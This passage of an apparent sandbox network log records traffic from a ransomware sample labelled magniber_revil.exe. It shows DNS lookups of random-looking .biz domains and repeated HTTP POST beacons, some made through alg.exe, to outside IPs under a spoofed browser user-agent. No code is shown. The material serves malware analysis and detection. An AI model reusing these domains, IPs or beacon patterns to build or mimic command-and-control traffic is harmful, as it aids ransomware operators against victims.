Pragma: no-cache
Host: cjvgcl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=146e985ea2ac71ec28b001e8ea261537|191.101.209.39|1719160456|1719160456|0|1|0; path=/; domain=.cjvgcl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

neazudmrq.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

neazudmrq.biz

IN A

Response

neazudmrq.biz

IN A

44.221.84.105
POST

http://neazudmrq.biz/rufnvitopah

alg.exe

Remote address:

44.221.84.105:80

Request

POST /rufnvitopah HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: neazudmrq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=404f5d7fdca980bea67f727362362ada|191.101.209.39|1719160456|1719160456|0|1|0; path=/; domain=.neazudmrq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

neazudmrq.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

neazudmrq.biz

IN A

Response

neazudmrq.biz

IN A

44.221.84.105
POST

http://neazudmrq.biz/abfeyfqs

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /abfeyfqs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: neazudmrq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3fbb89fb36ce8c2a802c522254f3f339|191.101.209.39|1719160456|1719160456|0|1|0; path=/; domain=.neazudmrq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pgfsvwx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

pgfsvwx.biz

IN A

Response

pgfsvwx.biz

IN A

18.208.156.248
POST

http://pgfsvwx.biz/iasjwao

alg.exe

Remote address:

18.208.156.248:80

Request

POST /iasjwao HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pgfsvwx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9c7b035a09f873831e759b792b51f9f9|191.101.209.39|1719160456|1719160456|0|1|0; path=/; domain=.pgfsvwx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pgfsvwx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

pgfsvwx.biz

IN A

Response

pgfsvwx.biz

IN A

18.208.156.248
DNS

aatcwo.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

aatcwo.biz

IN A

Response

aatcwo.biz

IN A

47.129.31.212
POST

http://pgfsvwx.biz/ymm

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /ymm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pgfsvwx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9431ec94613d954bb54a8cf54ad771e3|191.101.209.39|1719160457|1719160457|0|1|0; path=/; domain=.pgfsvwx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://aatcwo.biz/ymm

alg.exe

Remote address:

47.129.31.212:80

Request

POST /ymm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: aatcwo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=37e9a97bc6b72fc0ecab5fd351c9f32b|191.101.209.39|1719160457|1719160457|0|1|0; path=/; domain=.aatcwo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

aatcwo.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

aatcwo.biz

IN A

Response

aatcwo.biz

IN A

47.129.31.212
POST

http://aatcwo.biz/iygqfrgdwyjlsar

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /iygqfrgdwyjlsar HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: aatcwo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0ee1d671e2b3d08bf2b4513a8be1d5f9|191.101.209.39|1719160457|1719160457|0|1|0; path=/; domain=.aatcwo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kcyvxytog.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

kcyvxytog.biz

IN A

Response

kcyvxytog.biz

IN A

18.208.156.248
POST

http://kcyvxytog.biz/llniky

alg.exe

Remote address:

18.208.156.248:80

Request

POST /llniky HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kcyvxytog.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=45496575bf1672a9a50fbc6fd52d97f0|191.101.209.39|1719160458|1719160458|0|1|0; path=/; domain=.kcyvxytog.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kcyvxytog.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

kcyvxytog.biz

IN A

Response

kcyvxytog.biz

IN A

18.208.156.248
DNS

nwdnxrd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

nwdnxrd.biz

IN A

Response

nwdnxrd.biz

IN A

54.244.188.177
POST

http://kcyvxytog.biz/q

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.208.156.248:80

Request

POST /q HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kcyvxytog.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b1dec2ddec20754663ca8b0900e7c6de|191.101.209.39|1719160458|1719160458|0|1|0; path=/; domain=.kcyvxytog.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://nwdnxrd.biz/cx

alg.exe

Remote address:

54.244.188.177:80

Request

POST /cx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nwdnxrd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=363c90700c66821d54d24de1b53c89c6|191.101.209.39|1719160458|1719160458|0|1|0; path=/; domain=.nwdnxrd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nwdnxrd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

nwdnxrd.biz

IN A

Response

nwdnxrd.biz

IN A

54.244.188.177
POST

http://nwdnxrd.biz/hjaewpnobrjgiu

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /hjaewpnobrjgiu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nwdnxrd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a806d8dbc7186356ac1ccc5f6b7a8109|191.101.209.39|1719160458|1719160458|0|1|0; path=/; domain=.nwdnxrd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ereplfx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ereplfx.biz

IN A

Response

ereplfx.biz

IN A

44.213.104.86
POST

http://ereplfx.biz/onkt

alg.exe

Remote address:

44.213.104.86:80

Request

POST /onkt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ereplfx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2aa0a7afd13b7babe1a249fe82498003|191.101.209.39|1719160458|1719160458|0|1|0; path=/; domain=.ereplfx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ereplfx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ereplfx.biz

IN A

Response

ereplfx.biz

IN A

44.213.104.86
DNS

ptrim.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ptrim.biz

IN A

Response

ptrim.biz

IN A

18.141.10.107
POST

http://ereplfx.biz/ckgbfhufoxn

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.213.104.86:80

Request

POST /ckgbfhufoxn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ereplfx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=97c03d4581712df7eb4ff6975d9bc5fc|191.101.209.39|1719160459|1719160459|0|1|0; path=/; domain=.ereplfx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ptrim.biz/xsfwlodbhneqmede

alg.exe

Remote address:

18.141.10.107:80

Request

POST /xsfwlodbhneqmede HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ptrim.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=47fc6fdeba90cfcdb105fbb076fcde74|191.101.209.39|1719160459|1719160459|0|1|0; path=/; domain=.ptrim.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ptrim.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

ptrim.biz

IN A

Response

ptrim.biz

IN A

18.141.10.107
POST

http://ptrim.biz/twaeghp

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /twaeghp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ptrim.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=461e8ebc7c5a314de8d04d00907e8a50|191.101.209.39|1719160459|1719160459|0|1|0; path=/; domain=.ptrim.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://znwbniskf.biz/n

alg.exe

Remote address:

47.129.31.212:80

Request

POST /n HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: znwbniskf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=df03751c886c3fdf862e6e38ed7eaaee|191.101.209.39|1719160460|1719160460|0|1|0; path=/; domain=.znwbniskf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

znwbniskf.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

znwbniskf.biz

IN A

Response

znwbniskf.biz

IN A

47.129.31.212
POST

http://znwbniskf.biz/ncoeqjjxw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

47.129.31.212:80

Request

POST /ncoeqjjxw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: znwbniskf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5c524937d8d9f17a4e2154ca498bf30a|191.101.209.39|1719160461|1719160461|0|1|0; path=/; domain=.znwbniskf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cpclnad.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cpclnad.biz

IN A

Response

cpclnad.biz

IN A

44.221.84.105
POST

http://cpclnad.biz/rrvmjmh

alg.exe

Remote address:

44.221.84.105:80

Request

POST /rrvmjmh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cpclnad.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1e1bb5851b13f24a17ec7b7c8a0b893b|191.101.209.39|1719160461|1719160461|0|1|0; path=/; domain=.cpclnad.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cpclnad.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

cpclnad.biz

IN A

Response

cpclnad.biz

IN A

44.221.84.105
POST

http://cpclnad.biz/vgbamktfkc

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /vgbamktfkc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cpclnad.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9a43f91057b752d8d65c4b22413617d1|191.101.209.39|1719160461|1719160461|0|1|0; path=/; domain=.cpclnad.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mjheo.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

mjheo.biz

IN A

Response

mjheo.biz

IN A

44.221.84.105
POST

http://mjheo.biz/tel

alg.exe

Remote address:

44.221.84.105:80

Request

POST /tel HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mjheo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5bb0e10e2d365bee18754b58927939eb|191.101.209.39|1719160461|1719160461|0|1|0; path=/; domain=.mjheo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://mjheo.biz/msips

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

44.221.84.105:80

Request

POST /msips HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mjheo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a60692e4ca5a0476b5eb2a295091c10f|191.101.209.39|1719160462|1719160462|0|1|0; path=/; domain=.mjheo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wluwplyh.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

wluwplyh.biz

IN A

Response

wluwplyh.biz

IN A

18.141.10.107
POST

http://wluwplyh.biz/ljycysfgrvlitxn

alg.exe

Remote address:

18.141.10.107:80

Request

POST /ljycysfgrvlitxn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wluwplyh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=803c76bb49ae5d9fc486f648510ea9b7|191.101.209.39|1719160462|1719160462|0|1|0; path=/; domain=.wluwplyh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wluwplyh.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

wluwplyh.biz

IN A

Response

wluwplyh.biz

IN A

18.141.10.107
POST

http://wluwplyh.biz/px

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

18.141.10.107:80

Request

POST /px HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wluwplyh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=24406e7d44dd80bfa5415b6eaabfd47d|191.101.209.39|1719160462|1719160462|0|1|0; path=/; domain=.wluwplyh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zgapiej.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

zgapiej.biz

IN A

Response

zgapiej.biz

IN A

18.208.156.248
POST

http://zgapiej.biz/wia

alg.exe

Remote address:

18.208.156.248:80

Request

POST /wia HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zgapiej.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2ce98a935d81d7fd2059e283c927bcd2|191.101.209.39|1719160463|1719160463|0|1|0; path=/; domain=.zgapiej.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zgapiej.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

zgapiej.biz

IN A

Response

zgapiej.biz

IN A

18.208.156.248
DNS

jifai.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

